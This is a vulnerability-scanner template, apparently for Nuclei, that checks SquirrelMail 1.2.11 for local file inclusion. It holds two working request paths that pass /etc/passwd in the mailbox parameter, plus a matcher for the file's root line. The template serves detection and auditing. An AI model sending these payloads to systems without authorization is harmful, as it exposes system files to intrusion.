id: squirrelmail-lfi

info:
  name: SquirrelMail 1.2.11 - Local File Inclusion
  author: dhiyaneshDk
  severity: high
  description: SquirrelMail 1.2.11 is vulnerable to local file inclusion.
  reference:
    - https://www.exploit-db.com/exploits/22793
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cwe-id: CWE-22
  metadata:
    max-request: 2
  tags: lfi,squirrelmail,edb

http:
  - method: GET
    path:
      - "{{BaseURL}}/src/read_body.php?mailbox=/etc/passwd&passed_id=1&"
      - "{{BaseURL}}/src/download.php?absolute_dl=true&passed_id=1&passed_ent_id=1&mailbox=/etc/passwd"

    stop-at-first-match: true

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "root:[x*]:0:0"

      - type: status
        status:
          - 200

# digest: 4a0a00473045022100a5410ba2b358b31d6c603a27403befa930f0300bcc725a4d404dc8dedf3c40b20220289636f30c110854b6d87b88a3f41217d88f6c3445c729f1977385a455b999f8:922c64590222798bb761d5b6d8e72950
